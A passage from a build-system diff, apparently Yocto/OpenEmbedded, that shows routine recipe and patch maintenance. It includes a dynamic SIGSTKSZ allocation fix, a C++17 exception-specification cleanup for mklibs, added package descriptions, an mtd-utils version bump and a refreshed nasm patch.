21@@ -51,13 +51,14 @@
22 typedef struct sigaltstack stack_t;
23 #endif
24 #ifndef SIGSTKSZ
25-# define SIGSTKSZ 16384
26-#elif HAVE_LIBSIGSEGV && SIGSTKSZ < 16384
27+#define get_sigstksz() (16384)
28+#elif HAVE_LIBSIGSEGV
29 /* libsigsegv 2.6 through 2.8 have a bug where some architectures use
30 more than the Linux default of an 8k alternate stack when deciding
31 if a fault was caused by stack overflow. */
32-# undef SIGSTKSZ
33-# define SIGSTKSZ 16384
34+#define get_sigstksz() ((SIGSTKSZ) < 16384 ? 16384 : (SIGSTKSZ))
35+#else
36+#define get_sigstksz() ((SIGSTKSZ))
37 #endif
38
39 #include <stdlib.h>
40@@ -131,7 +132,8 @@ die (int signo)
41 /* Storage for the alternate signal stack. */
42 static union
43 {
44- char buffer[SIGSTKSZ];
45+ /* allocate buffer with size from get_sigstksz() */
46+ char *buffer;
47
48 /* These other members are for proper alignment. There's no
49 standard way to guarantee stack alignment, but this seems enough
50@@ -203,10 +205,11 @@ c_stack_action (void (*action) (int))
51 program_error_message = _("program error");
52 stack_overflow_message = _("stack overflow");
53
54+ alternate_signal_stack.buffer = malloc(get_sigstksz());
55 /* Always install the overflow handler. */
56 if (stackoverflow_install_handler (overflow_handler,
57 alternate_signal_stack.buffer,
58- sizeof alternate_signal_stack.buffer))
59+ get_sigstksz()))
60 {
61 errno = ENOTSUP;
62 return -1;
63@@ -279,14 +282,15 @@ c_stack_action (void (*action) (int))
64 stack_t st;
65 struct sigaction act;
66 st.ss_flags = 0;
67+ alternate_signal_stack.buffer = malloc(get_sigstksz());
68 # if SIGALTSTACK_SS_REVERSED
69 /* Irix mistakenly treats ss_sp as the upper bound, rather than
70 lower bound, of the alternate stack. */
71- st.ss_sp = alternate_signal_stack.buffer + SIGSTKSZ - sizeof (void *);
72- st.ss_size = sizeof alternate_signal_stack.buffer - sizeof (void *);
73+ st.ss_sp = alternate_signal_stack.buffer + get_sigstksz() - sizeof (void *);
74+ st.ss_size = get_sigstksz() - sizeof (void *);
75 # else
76 st.ss_sp = alternate_signal_stack.buffer;
77- st.ss_size = sizeof alternate_signal_stack.buffer;
78+ st.ss_size = get_sigstksz();
79 # endif
80 r = sigaltstack (&st, NULL);
81 if (r != 0)
82--
832.31.1
84
diff --git a/meta/recipes-devtools/makedevs/makedevs_1.0.1.bb b/meta/recipes-devtools/makedevs/makedevs_1.0.1.bb
index 92d5870f42..5910f4bc70 100644
--- a/meta/recipes-devtools/makedevs/makedevs_1.0.1.bb
+++ b/meta/recipes-devtools/makedevs/makedevs_1.0.1.bb
@@ -1,4 +1,5 @@
1SUMMARY = "Tool for creating device nodes" 1SUMMARY = "Tool for creating device nodes"
2DESCRIPTION = "${SUMMARY}"
2LICENSE = "GPLv2" 3LICENSE = "GPLv2"
3LIC_FILES_CHKSUM = "file://COPYING;md5=393a5ca445f6965873eca0259a17f833" 4LIC_FILES_CHKSUM = "file://COPYING;md5=393a5ca445f6965873eca0259a17f833"
4SECTION = "base" 5SECTION = "base"
diff --git a/meta/recipes-devtools/mklibs/files/remove-deprecated-exception-specification-cpp17.patch b/meta/recipes-devtools/mklibs/files/remove-deprecated-exception-specification-cpp17.patch
new file mode 100644
index 0000000000..f96cc7d302
--- /dev/null
+++ b/meta/recipes-devtools/mklibs/files/remove-deprecated-exception-specification-cpp17.patch
@@ -0,0 +1,431 @@
1From 597c7a8333df84a87cc48fb8477b603ffbf372a6 Mon Sep 17 00:00:00 2001
2From: Andrej Valek <andrej.valek@siemens.com>
3Date: Mon, 23 Aug 2021 12:45:11 +0200
4Subject: [PATCH] feat(cpp17): remove deprecated exception specifications for
5 C++ 17
6
7Upstream-Status: Submitted [https://salsa.debian.org/installer-team/mklibs/-/merge_requests/2]
8
9based on: http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2016/p0003r5.html
10
11Signed-off-by: Andrej Valek <andrej.valek@siemens.com>
12---
13 src/mklibs-readelf/elf.cpp | 48 ++++++++++++++++++++---------------------
14 src/mklibs-readelf/elf.hpp | 18 ++++++++--------
15 src/mklibs-readelf/elf_data.hpp | 36 +++++++++++++++----------------
16 3 files changed, 51 insertions(+), 51 deletions(-)
17
18diff --git a/src/mklibs-readelf/elf.cpp b/src/mklibs-readelf/elf.cpp
19index 0e4c0f3..2e6d0f6 100644
20--- a/src/mklibs-readelf/elf.cpp
21+++ b/src/mklibs-readelf/elf.cpp
22@@ -36,7 +36,7 @@ file::~file () throw ()
23 delete *it;
24 }
25
26-file *file::open (const char *filename) throw (std::bad_alloc, std::runtime_error)
27+file *file::open (const char *filename) throw ()
28 {
29 struct stat buf;
30 int fd;
31@@ -72,7 +72,7 @@ file *file::open (const char *filename) throw (std::bad_alloc, std::runtime_erro
32 }
33
34 template<typename _class>
35-file *file::open_class(uint8_t *mem, size_t len) throw (std::bad_alloc, std::runtime_error)
36+file *file::open_class(uint8_t *mem, size_t len) throw ()
37 {
38 switch (mem[EI_DATA])
39 {
40@@ -86,7 +86,7 @@ file *file::open_class(uint8_t *mem, size_t len) throw (std::bad_alloc, std::run
41 }
42
43 template <typename _class, typename _data>
44-file_data<_class, _data>::file_data(uint8_t *mem, size_t len) throw (std::bad_alloc, std::runtime_error)
45+file_data<_class, _data>::file_data(uint8_t *mem, size_t len) throw ()
46 : file(mem, len)
47 {
48 if (mem[EI_CLASS] != _class::id)
49@@ -190,7 +190,7 @@ section_data<_class, _data>::section_data(Shdr *shdr, uint8_t *mem) throw ()
50 }
51
52 template <typename _class, typename _data>
53-void section_data<_class, _data>::update(const file &file) throw (std::bad_alloc)
54+void section_data<_class, _data>::update(const file &file) throw ()
55 {
56 const section_type<section_type_STRTAB> &section =
57 dynamic_cast<const section_type<section_type_STRTAB> &>(file.get_section(file.get_shstrndx()));
58@@ -204,7 +204,7 @@ section_type<section_type_DYNAMIC>::~section_type() throw ()
59 }
60
61 template <typename _class, typename _data>
62-section_real<_class, _data, section_type_DYNAMIC>::section_real(Shdr *header, uint8_t *mem) throw (std::bad_alloc)
63+section_real<_class, _data, section_type_DYNAMIC>::section_real(Shdr *header, uint8_t *mem) throw ()
64 : section_data<_class, _data>(header, mem)
65 {
66 if (this->type != SHT_DYNAMIC)
67@@ -221,7 +221,7 @@ section_real<_class, _data, section_type_DYNAMIC>::section_real(Shdr *header, ui
68 }
69
70 template <typename _class, typename _data>
71-void section_real<_class, _data, section_type_DYNAMIC>::update(const file &file) throw (std::bad_alloc)
72+void section_real<_class, _data, section_type_DYNAMIC>::update(const file &file) throw ()
73 {
74 section_data<_class, _data>::update(file);
75
76@@ -243,7 +243,7 @@ section_type<section_type_DYNSYM>::~section_type() throw ()
77 }
78
79 template <typename _class, typename _data>
80-section_real<_class, _data, section_type_DYNSYM>::section_real(Shdr *header, uint8_t *mem) throw (std::bad_alloc)
81+section_real<_class, _data, section_type_DYNSYM>::section_real(Shdr *header, uint8_t *mem) throw ()
82 : section_data<_class, _data>(header, mem)
83 {
84 if (this->type != SHT_DYNSYM)
85@@ -260,7 +260,7 @@ section_real<_class, _data, section_type_DYNSYM>::section_real(Shdr *header, uin
86 }
87
88 template <typename _class, typename _data>
89-void section_real<_class, _data, section_type_DYNSYM>::update(const file &file) throw (std::bad_alloc)
90+void section_real<_class, _data, section_type_DYNSYM>::update(const file &file) throw ()
91 {
92 section_data<_class, _data>::update (file);
93
94@@ -285,7 +285,7 @@ const version_definition *section_type<section_type_GNU_VERDEF>::get_version_def
95 }
96
97 template <typename _class, typename _data>
98-section_real<_class, _data, section_type_GNU_VERDEF>::section_real(Shdr *header, uint8_t *mem) throw (std::bad_alloc)
99+section_real<_class, _data, section_type_GNU_VERDEF>::section_real(Shdr *header, uint8_t *mem) throw ()
100 : section_data<_class, _data>(header, mem)
101 {
102 if (this->type != SHT_GNU_verdef)
103@@ -307,7 +307,7 @@ section_real<_class, _data, section_type_GNU_VERDEF>::section_real(Shdr *header,
104 }
105
106 template <typename _class, typename _data>
107-void section_real<_class, _data, section_type_GNU_VERDEF>::update(const file &file) throw (std::bad_alloc)
108+void section_real<_class, _data, section_type_GNU_VERDEF>::update(const file &file) throw ()
109 {
110 section_data<_class, _data>::update(file);
111
112@@ -333,7 +333,7 @@ const version_requirement_entry *section_type<section_type_GNU_VERNEED>::get_ver
113
114 template <typename _class, typename _data>
115 section_real<_class, _data, section_type_GNU_VERNEED>::
116-section_real(Shdr *header, uint8_t *mem) throw (std::bad_alloc)
117+section_real(Shdr *header, uint8_t *mem) throw ()
118 : section_data<_class, _data> (header, mem)
119 {
120 if (this->type != SHT_GNU_verneed)
121@@ -355,7 +355,7 @@ section_real(Shdr *header, uint8_t *mem) throw (std::bad_alloc)
122 }
123
124 template <typename _class, typename _data>
125-void section_real<_class, _data, section_type_GNU_VERNEED>::update(const file &file) throw (std::bad_alloc)
126+void section_real<_class, _data, section_type_GNU_VERNEED>::update(const file &file) throw ()
127 {
128 section_data<_class, _data>::update(file);
129
130@@ -372,7 +372,7 @@ void section_real<_class, _data, section_type_GNU_VERNEED>::update(const file &f
131
132 template <typename _class, typename _data>
133 section_real<_class, _data, section_type_GNU_VERSYM>::
134-section_real (Shdr *header, uint8_t *mem) throw (std::bad_alloc)
135+section_real (Shdr *header, uint8_t *mem) throw ()
136 : section_data<_class, _data> (header, mem)
137 {
138 if (this->type != SHT_GNU_versym)
139@@ -399,7 +399,7 @@ segment_data<_class, _data>::segment_data (Phdr *phdr, uint8_t *mem) throw ()
140 }
141
142 template <typename _class, typename _data>
143-segment_real<_class, _data, segment_type_INTERP>::segment_real (Phdr *header, uint8_t *mem) throw (std::bad_alloc)
144+segment_real<_class, _data, segment_type_INTERP>::segment_real (Phdr *header, uint8_t *mem) throw ()
145 : segment_data<_class, _data> (header, mem)
146 {
147 if (this->type != PT_INTERP)
148@@ -429,13 +429,13 @@ dynamic_data<_class, _data>::dynamic_data (Dyn *dyn) throw ()
149 }
150
151 template <typename _class, typename _data>
152-void dynamic_data<_class, _data>::update_string(const section_type<section_type_STRTAB> &section) throw (std::bad_alloc)
153+void dynamic_data<_class, _data>::update_string(const section_type<section_type_STRTAB> &section) throw ()
154 {
155 if (is_string)
156 val_string = section.get_string(val);
157 }
158
159-std::string symbol::get_version () const throw (std::bad_alloc)
160+std::string symbol::get_version () const throw ()
161 {
162 if (verneed)
163 return verneed->get_name();
164@@ -445,7 +445,7 @@ std::string symbol::get_version () const throw (std::bad_alloc)
165 return "Base";
166 }
167
168-std::string symbol::get_version_file () const throw (std::bad_alloc)
169+std::string symbol::get_version_file () const throw ()
170 {
171 if (verneed)
172 return verneed->get_file();
173@@ -453,7 +453,7 @@ std::string symbol::get_version_file () const throw (std::bad_alloc)
174 return "None";
175 }
176
177-std::string symbol::get_name_version () const throw (std::bad_alloc)
178+std::string symbol::get_name_version () const throw ()
179 {
180 std::string ver;
181
182@@ -478,13 +478,13 @@ symbol_data<_class, _data>::symbol_data (Sym *sym) throw ()
183 }
184
185 template <typename _class, typename _data>
186-void symbol_data<_class, _data>::update_string(const section_type<section_type_STRTAB> &section) throw (std::bad_alloc)
187+void symbol_data<_class, _data>::update_string(const section_type<section_type_STRTAB> &section) throw ()
188 {
189 name_string = section.get_string(name);
190 }
191
192 template <typename _class, typename _data>
193-void symbol_data<_class, _data>::update_version(const file &file, uint16_t index) throw (std::bad_alloc)
194+void symbol_data<_class, _data>::update_version(const file &file, uint16_t index) throw ()
195 {
196 if (!file.get_section_GNU_VERSYM())
197 return;
198@@ -531,13 +531,13 @@ version_definition_data<_class, _data>::version_definition_data (Verdef *verdef)
199 }
200
201 template <typename _class, typename _data>
202-void version_definition_data<_class, _data>::update_string(const section_type<section_type_STRTAB> &section) throw (std::bad_alloc)
203+void version_definition_data<_class, _data>::update_string(const section_type<section_type_STRTAB> &section) throw ()
204 {
205 for (std::vector<uint32_t>::iterator it = names.begin(); it != names.end(); ++it)
206 names_string.push_back(section.get_string(*it));
207 }
208
209-version_requirement::version_requirement() throw (std::bad_alloc)
210+version_requirement::version_requirement() throw ()
211 : file_string("None")
212 { }
213
214@@ -561,7 +561,7 @@ version_requirement_data<_class, _data>::version_requirement_data (Verneed *vern
215
216 template <typename _class, typename _data>
217 void version_requirement_data<_class, _data>::
218-update_string(const section_type<section_type_STRTAB> &section) throw (std::bad_alloc)
219+update_string(const section_type<section_type_STRTAB> &section) throw ()
220 {
221 file_string = section.get_string(file);
222
223@@ -596,7 +596,7 @@ version_requirement_entry_data(Vernaux *vna, const version_requirement &verneed)
224
225 template <typename _class, typename _data>
226 void version_requirement_entry_data<_class, _data>::
227-update_string(const section_type<section_type_STRTAB> &section) throw (std::bad_alloc)
228+update_string(const section_type<section_type_STRTAB> &section) throw ()
229 {
230 name_string = section.get_string(name);
231 }
232diff --git a/src/mklibs-readelf/elf.hpp b/src/mklibs-readelf/elf.hpp
233index 70e61cd..afb0c9e 100644
234--- a/src/mklibs-readelf/elf.hpp
235+++ b/src/mklibs-readelf/elf.hpp
236@@ -49,7 +49,7 @@ namespace Elf
237 const uint16_t get_shstrndx() const throw () { return shstrndx; }
238
239 const std::vector<section *> get_sections() const throw () { return sections; };
240- const section &get_section(unsigned int i) const throw (std::out_of_range) { return *sections.at(i); };
241+ const section &get_section(unsigned int i) const throw () { return *sections.at(i); };
242 const section_type<section_type_DYNAMIC> *get_section_DYNAMIC() const throw () { return section_DYNAMIC; };
243 const section_type<section_type_DYNSYM> *get_section_DYNSYM() const throw () { return section_DYNSYM; };
244 const section_type<section_type_GNU_VERDEF> *get_section_GNU_VERDEF() const throw () { return section_GNU_VERDEF; };
245@@ -59,13 +59,13 @@ namespace Elf
246 const std::vector<segment *> get_segments() const throw () { return segments; };
247 const segment_type<segment_type_INTERP> *get_segment_INTERP() const throw () { return segment_INTERP; };
248
249- static file *open(const char *filename) throw (std::bad_alloc, std::runtime_error);
250+ static file *open(const char *filename) throw ();
251
252 protected:
253- file(uint8_t *mem, size_t len) throw (std::bad_alloc) : mem(mem), len(len) { }
254+ file(uint8_t *mem, size_t len) throw () : mem(mem), len(len) { }
255
256 template<typename _class>
257- static file *open_class(uint8_t *, size_t) throw (std::bad_alloc, std::runtime_error);
258+ static file *open_class(uint8_t *, size_t) throw ();
259
260 uint16_t type;
261 uint16_t machine;
262@@ -128,7 +128,7 @@ namespace Elf
263 class section_type<section_type_STRTAB> : public virtual section
264 {
265 public:
266- std::string get_string(uint32_t offset) const throw (std::bad_alloc)
267+ std::string get_string(uint32_t offset) const throw ()
268 {
269 return std::string(reinterpret_cast<const char *> (mem + offset));
270 }
271@@ -263,10 +263,10 @@ namespace Elf
272 uint8_t get_bind () const throw () { return bind; }
273 uint8_t get_type () const throw () { return type; }
274 const std::string &get_name_string() const throw () { return name_string; }
275- std::string get_version() const throw (std::bad_alloc);
276- std::string get_version_file() const throw (std::bad_alloc);
277+ std::string get_version() const throw ();
278+ std::string get_version_file() const throw ();
279 uint16_t get_version_data() const throw () { return versym; }
280- std::string get_name_version() const throw (std::bad_alloc);
281+ std::string get_name_version() const throw ();
282
283 protected:
284 uint32_t name;
285@@ -305,7 +305,7 @@ namespace Elf
286 class version_requirement
287 {
288 public:
289- version_requirement() throw (std::bad_alloc);
290+ version_requirement() throw ();
291 virtual ~version_requirement () throw () { }
292
293 const std::string &get_file() const throw () { return file_string; }
294diff --git a/src/mklibs-readelf/elf_data.hpp b/src/mklibs-readelf/elf_data.hpp
295index 05effee..3871982 100644
296--- a/src/mklibs-readelf/elf_data.hpp
297+++ b/src/mklibs-readelf/elf_data.hpp
298@@ -94,7 +94,7 @@ namespace Elf
299 class file_data : public file
300 {
301 public:
302- file_data(uint8_t *, size_t len) throw (std::bad_alloc, std::runtime_error);
303+ file_data(uint8_t *, size_t len) throw ();
304
305 const uint8_t get_class() const throw () { return _class::id; }
306 const uint8_t get_data() const throw () { return _data::id; }
307@@ -109,7 +109,7 @@ namespace Elf
308 public:
309 section_data(Shdr *, uint8_t *) throw ();
310
311- virtual void update(const file &) throw (std::bad_alloc);
312+ virtual void update(const file &) throw ();
313 };
314
315 template <typename _class, typename _data, typename _type>
316@@ -133,9 +133,9 @@ namespace Elf
317 typedef typename _elfdef<_class>::Shdr Shdr;
318
319 public:
320- section_real(Shdr *, uint8_t *) throw (std::bad_alloc);
321+ section_real(Shdr *, uint8_t *) throw ();
322
323- void update(const file &) throw (std::bad_alloc);
324+ void update(const file &) throw ();
325 };
326
327 template <typename _class, typename _data>
328@@ -147,9 +147,9 @@ namespace Elf
329 typedef typename _elfdef<_class>::Shdr Shdr;
330
331 public:
332- section_real(Shdr *, uint8_t *) throw (std::bad_alloc);
333+ section_real(Shdr *, uint8_t *) throw ();
334
335- void update(const file &) throw (std::bad_alloc);
336+ void update(const file &) throw ();
337 };
338
339 template <typename _class, typename _data>
340@@ -161,9 +161,9 @@ namespace Elf
341 typedef typename _elfdef<_class>::Shdr Shdr;
342
343 public:
344- section_real(Shdr *, uint8_t *) throw (std::bad_alloc);
345+ section_real(Shdr *, uint8_t *) throw ();
346
347- void update(const file &) throw (std::bad_alloc);
348+ void update(const file &) throw ();
349 };
350
351 template <typename _class, typename _data>
352@@ -175,9 +175,9 @@ namespace Elf
353 typedef typename _elfdef<_class>::Shdr Shdr;
354
355 public:
356- section_real(Shdr *, uint8_t *) throw (std::bad_alloc);
357+ section_real(Shdr *, uint8_t *) throw ();
358
359- void update(const file &) throw (std::bad_alloc);
360+ void update(const file &) throw ();
361 };
362
363 template <typename _class, typename _data>
364@@ -189,7 +189,7 @@ namespace Elf
365 typedef typename _elfdef<_class>::Shdr Shdr;
366
367 public:
368- section_real(Shdr *, uint8_t *) throw (std::bad_alloc);
369+ section_real(Shdr *, uint8_t *) throw ();
370 };
371
372 template <typename _class, typename _data>
373@@ -220,7 +220,7 @@ namespace Elf
374 typedef typename _elfdef<_class>::Phdr Phdr;
375
376 public:
377- segment_real (Phdr *, uint8_t *) throw (std::bad_alloc);
378+ segment_real (Phdr *, uint8_t *) throw ();
379 };
380
381 template <typename _class, typename _data>
382@@ -232,7 +232,7 @@ namespace Elf
383 public:
384 dynamic_data (Dyn *) throw ();
385
386- void update_string(const section_type<section_type_STRTAB> &) throw (std::bad_alloc);
387+ void update_string(const section_type<section_type_STRTAB> &) throw ();
388 };
389
390 template <typename _class, typename _data>
391@@ -244,8 +244,8 @@ namespace Elf
392 public:
393 symbol_data (Sym *) throw ();
394
395- void update_string(const section_type<section_type_STRTAB> &) throw (std::bad_alloc);
396- virtual void update_version (const file &, uint16_t) throw (std::bad_alloc);
397+ void update_string(const section_type<section_type_STRTAB> &) throw ();
398+ virtual void update_version (const file &, uint16_t) throw ();
399 };
400
401 template <typename _class, typename _data>
402@@ -257,7 +257,7 @@ namespace Elf
403
404 version_definition_data (Verdef *) throw ();
405
406- void update_string(const section_type<section_type_STRTAB> &) throw (std::bad_alloc);
407+ void update_string(const section_type<section_type_STRTAB> &) throw ();
408 };
409
410 template <typename _class, typename _data>
411@@ -269,7 +269,7 @@ namespace Elf
412
413 version_requirement_data (Verneed *) throw ();
414
415- void update_string(const section_type<section_type_STRTAB> &) throw (std::bad_alloc);
416+ void update_string(const section_type<section_type_STRTAB> &) throw ();
417 };
418
419 template <typename _class, typename _data>
420@@ -280,7 +280,7 @@ namespace Elf
421
422 version_requirement_entry_data (Vernaux *, const version_requirement &) throw ();
423
424- void update_string(const section_type<section_type_STRTAB> &) throw (std::bad_alloc);
425+ void update_string(const section_type<section_type_STRTAB> &) throw ();
426 };
427 }
428
429--
4302.11.0
431
diff --git a/meta/recipes-devtools/mklibs/mklibs-native_0.1.44.bb b/meta/recipes-devtools/mklibs/mklibs-native_0.1.44.bb
index 1784af1f4c..07142e57e0 100644
--- a/meta/recipes-devtools/mklibs/mklibs-native_0.1.44.bb
+++ b/meta/recipes-devtools/mklibs/mklibs-native_0.1.44.bb
@@ -12,6 +12,7 @@ SRC_URI = "http://snapshot.debian.org/archive/debian/20180828T214102Z/pool/main/
12 file://avoid-failure-on-symbol-provided-by-application.patch \ 12 file://avoid-failure-on-symbol-provided-by-application.patch \
13 file://show-GNU-unique-symbols-as-provided-symbols.patch \ 13 file://show-GNU-unique-symbols-as-provided-symbols.patch \
14 file://fix_cross_compile.patch \ 14 file://fix_cross_compile.patch \
15 file://remove-deprecated-exception-specification-cpp17.patch \
15" 16"
16 17
17SRC_URI[md5sum] = "6b6eeb9b4016c6a7317acc28c89e32cc" 18SRC_URI[md5sum] = "6b6eeb9b4016c6a7317acc28c89e32cc"
diff --git a/meta/recipes-devtools/mmc/mmc-utils_git.bb b/meta/recipes-devtools/mmc/mmc-utils_git.bb
index 5fd1c5c0cd..8fe606915e 100644
--- a/meta/recipes-devtools/mmc/mmc-utils_git.bb
+++ b/meta/recipes-devtools/mmc/mmc-utils_git.bb
@@ -1,5 +1,6 @@
1SUMMARY = "Userspace tools for MMC/SD devices" 1SUMMARY = "Userspace tools for MMC/SD devices"
2HOMEPAGE = "http://git.kernel.org/cgit/linux/kernel/git/cjb/mmc-utils.git/" 2HOMEPAGE = "http://git.kernel.org/cgit/linux/kernel/git/cjb/mmc-utils.git/"
3DESCRIPTION = "${SUMMARY}"
3LICENSE = "GPLv2" 4LICENSE = "GPLv2"
4LIC_FILES_CHKSUM = "file://mmc.c;beginline=1;endline=20;md5=fae32792e20f4d27ade1c5a762d16b7d" 5LIC_FILES_CHKSUM = "file://mmc.c;beginline=1;endline=20;md5=fae32792e20f4d27ade1c5a762d16b7d"
5 6
diff --git a/meta/recipes-devtools/mtd/mtd-utils/0001-mtd-utils-Fix-return-value-of-ubiformat.patch b/meta/recipes-devtools/mtd/mtd-utils/0001-mtd-utils-Fix-return-value-of-ubiformat.patch
deleted file mode 100644
index d43f7e1a7a..0000000000
--- a/meta/recipes-devtools/mtd/mtd-utils/0001-mtd-utils-Fix-return-value-of-ubiformat.patch
+++ /dev/null
@@ -1,62 +0,0 @@
1From 4d19bffcfd66e25d3ee74536ae2d2da7ad52e8e2 Mon Sep 17 00:00:00 2001
2From: Barry Grussling <barry@grussling.com>
3Date: Sun, 12 Jan 2020 12:33:32 -0800
4Subject: [PATCH] mtd-utils: Fix return value of ubiformat
5Organization: O.S. Systems Software LTDA.
6
7This changeset fixes a feature regression in ubiformat. Older versions of
8ubiformat, when invoked with a flash-image, would return 0 in the case no error
9was encountered. Upon upgrading to latest, it was discovered that ubiformat
10returned 255 even without encountering an error condition.
11
12This changeset corrects the above issue and causes ubiformat, when given an
13image file, to return 0 when no errors are detected.
14
15Tested by running through my loading scripts and verifying ubiformat returned
160.
17
18Upstream-Status: Backport [2.1.2]
19
20Signed-off-by: Barry Grussling <barry@grussling.com>
21Signed-off-by: David Oberhollenzer <david.oberhollenzer@sigma-star.at>
22Signed-off-by: Otavio Salvador <otavio@ossystems.com.br>
23---
24 ubi-utils/ubiformat.c | 7 +++++--
25 1 file changed, 5 insertions(+), 2 deletions(-)
26
27diff --git a/ubi-utils/ubiformat.c b/ubi-utils/ubiformat.c
28index a90627c..5377b12 100644
29--- a/ubi-utils/ubiformat.c
30+++ b/ubi-utils/ubiformat.c
31@@ -550,6 +550,7 @@ static int format(libmtd_t libmtd, const struct mtd_dev_info *mtd,
32 struct ubi_vtbl_record *vtbl;
33 int eb1 = -1, eb2 = -1;
34 long long ec1 = -1, ec2 = -1;
35+ int ret = -1;
36
37 write_size = UBI_EC_HDR_SIZE + mtd->subpage_size - 1;
38 write_size /= mtd->subpage_size;
39@@ -643,8 +644,10 @@ static int format(libmtd_t libmtd, const struct mtd_dev_info *mtd,
40 if (!args.quiet && !args.verbose)
41 printf("\n");
42
43- if (novtbl)
44+ if (novtbl) {
45+ ret = 0;
46 goto out_free;
47+ }
48
49 if (eb1 == -1 || eb2 == -1) {
50 errmsg("no eraseblocks for volume table");
51@@ -669,7 +672,7 @@ static int format(libmtd_t libmtd, const struct mtd_dev_info *mtd,
52
53 out_free:
54 free(hdr);
55- return -1;
56+ return ret;
57 }
58
59 int main(int argc, char * const argv[])
60--
612.27.0
62
diff --git a/meta/recipes-devtools/mtd/mtd-utils_git.bb b/meta/recipes-devtools/mtd/mtd-utils_git.bb
index 67cd8582b5..fa42770ee4 100644
--- a/meta/recipes-devtools/mtd/mtd-utils_git.bb
+++ b/meta/recipes-devtools/mtd/mtd-utils_git.bb
@@ -1,5 +1,6 @@
1SUMMARY = "Tools for managing memory technology devices" 1SUMMARY = "Tools for managing memory technology devices"
2HOMEPAGE = "http://www.linux-mtd.infradead.org/" 2HOMEPAGE = "http://www.linux-mtd.infradead.org/"
3DESCRIPTION = "mtd-utils tool is a generic Linux subsystem for memory devices, especially Flash devices."
3SECTION = "base" 4SECTION = "base"
4LICENSE = "GPLv2+" 5LICENSE = "GPLv2+"
5LIC_FILES_CHKSUM = "file://COPYING;md5=0636e73ff0215e8d672dc4c32c317bb3 \ 6LIC_FILES_CHKSUM = "file://COPYING;md5=0636e73ff0215e8d672dc4c32c317bb3 \
@@ -10,18 +11,15 @@ inherit autotools pkgconfig update-alternatives
10DEPENDS = "zlib e2fsprogs util-linux" 11DEPENDS = "zlib e2fsprogs util-linux"
11RDEPENDS_mtd-utils-tests += "bash" 12RDEPENDS_mtd-utils-tests += "bash"
12 13
13PV = "2.1.1" 14PV = "2.1.3"
14 15
15SRCREV = "4443221ce9b88440cd9f5bb78e6fe95621d36c8a" 16SRCREV = "42ea7cd48d2b3c306d59bb6c530d79f8c25bf9f5"
16SRC_URI = "git://git.infradead.org/mtd-utils.git \ 17SRC_URI = "git://git.infradead.org/mtd-utils.git;branch=master \
17 file://add-exclusion-to-mkfs-jffs2-git-2.patch \ 18 file://add-exclusion-to-mkfs-jffs2-git-2.patch \
18 file://0001-mtd-utils-Fix-return-value-of-ubiformat.patch \ 19 "
19"
20 20
21S = "${WORKDIR}/git/" 21S = "${WORKDIR}/git/"
22 22
23EXTRA_OECONF += "--enable-install-tests"
24
25# xattr support creates an additional compile-time dependency on acl because 23# xattr support creates an additional compile-time dependency on acl because
26# the sys/acl.h header is needed. libacl is not needed and thus enabling xattr 24# the sys/acl.h header is needed. libacl is not needed and thus enabling xattr
27# regardless whether acl is enabled or disabled in the distro should be okay. 25# regardless whether acl is enabled or disabled in the distro should be okay.
diff --git a/meta/recipes-devtools/nasm/nasm/0002-Add-debug-prefix-map-option.patch b/meta/recipes-devtools/nasm/nasm/0002-Add-debug-prefix-map-option.patch
index f788e0fd43..9f4c8dc0bd 100644
--- a/meta/recipes-devtools/nasm/nasm/0002-Add-debug-prefix-map-option.patch
+++ b/meta/recipes-devtools/nasm/nasm/0002-Add-debug-prefix-map-option.patch
@@ -1,4 +1,4 @@
1From bb4e42ad3a0cdd23a1d1797e6299c76b474867c0 Mon Sep 17 00:00:00 2001 1From 81d6519499dcfebe7d21e65e002a8885a4e8d852 Mon Sep 17 00:00:00 2001
2From: Joshua Watt <JPEWhacker@gmail.com> 2From: Joshua Watt <JPEWhacker@gmail.com>
3Date: Tue, 19 Nov 2019 13:12:17 -0600 3Date: Tue, 19 Nov 2019 13:12:17 -0600
4Subject: [PATCH] Add --debug-prefix-map option 4Subject: [PATCH] Add --debug-prefix-map option
@@ -11,7 +11,7 @@ Upstream-Status: Submitted [https://bugzilla.nasm.us/show_bug.cgi?id=3392635]
11Signed-off-by: Joshua Watt <JPEWhacker@gmail.com> 11Signed-off-by: Joshua Watt <JPEWhacker@gmail.com>
12 12
13--- 13---
14 asm/nasm.c | 26 +++++++++++++++++++++++++- 14 asm/nasm.c | 24 ++++++++++++++++++++++++
15 include/nasmlib.h | 9 +++++++++ 15 include/nasmlib.h | 9 +++++++++
16 nasm.txt | 4 ++++ 16 nasm.txt | 4 ++++
17 nasmlib/filename.c | 20 ++++++++++++++++++++ 17 nasmlib/filename.c | 20 ++++++++++++++++++++
@@ -23,34 +23,32 @@ Signed-off-by: Joshua Watt <JPEWhacker@gmail.com>
23 stdlib/strlcat.c | 2 +- 23 stdlib/strlcat.c | 2 +-
24 test/elfdebugprefix.asm | 6 ++++++ 24 test/elfdebugprefix.asm | 6 ++++++
25 test/performtest.pl | 12 ++++++++++-- 25 test/performtest.pl | 12 ++++++++++--
26 12 files changed, 83 insertions(+), 10 deletions(-) 26 12 files changed, 82 insertions(+), 9 deletions(-)
27 create mode 100644 test/elfdebugprefix.asm 27 create mode 100644 test/elfdebugprefix.asm
28 28
29diff --git a/asm/nasm.c b/asm/nasm.c 29diff --git a/asm/nasm.c b/asm/nasm.c
30index a0e1719..fc6c62e 100644 30index e5ae89a..7a7f8b4 100644
31--- a/asm/nasm.c 31--- a/asm/nasm.c
32+++ b/asm/nasm.c 32+++ b/asm/nasm.c
33@@ -938,7 +938,8 @@ enum text_options { 33@@ -939,6 +939,7 @@ enum text_options {
34 OPT_LIMIT,
35 OPT_KEEP_ALL, 34 OPT_KEEP_ALL,
36 OPT_NO_LINE, 35 OPT_NO_LINE,
37- OPT_DEBUG 36 OPT_DEBUG,
38+ OPT_DEBUG, 37+ OPT_DEBUG_PREFIX_MAP,
39+ OPT_DEBUG_PREFIX_MAP 38 OPT_REPRODUCIBLE
40 }; 39 };
41 enum need_arg { 40 enum need_arg {
42 ARG_NO, 41@@ -971,6 +972,7 @@ static const struct textargs textopts[] = {
43@@ -970,6 +971,7 @@ static const struct textargs textopts[] = {
44 {"keep-all", OPT_KEEP_ALL, ARG_NO, 0}, 42 {"keep-all", OPT_KEEP_ALL, ARG_NO, 0},
45 {"no-line", OPT_NO_LINE, ARG_NO, 0}, 43 {"no-line", OPT_NO_LINE, ARG_NO, 0},
46 {"debug", OPT_DEBUG, ARG_MAYBE, 0}, 44 {"debug", OPT_DEBUG, ARG_MAYBE, 0},
